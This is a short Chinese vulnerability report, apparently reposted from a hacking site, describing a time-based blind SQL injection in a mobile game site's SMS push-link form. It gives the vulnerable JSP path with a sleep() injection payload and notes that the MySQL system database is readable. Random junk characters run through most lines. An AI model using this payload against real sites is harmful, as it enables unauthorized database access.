简要描述:* h$ j' V/ t: i: e0 i3 E( X
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。' z& b; ~, c {* i$ X$ N5 o- ?
5 A+ g( d8 w1 v/ ]4 u详细说明:) H6 n! ^9 l) M0 [% }- ` @
存在SQL盲注url:
6 i6 l. w- Z* J8 i6 x" W3 yfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=15 l. i/ R1 {5 s! M$ Y
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png$ G! z- f- u5 m- H, ]/ o; r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
4 L: ]/ f8 V+ u& P' ehttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
: s$ f8 j, J- X
# K9 ?, V8 Z$ Y% e能看到mysql系统数据库,看来user权限应该很高的。。 |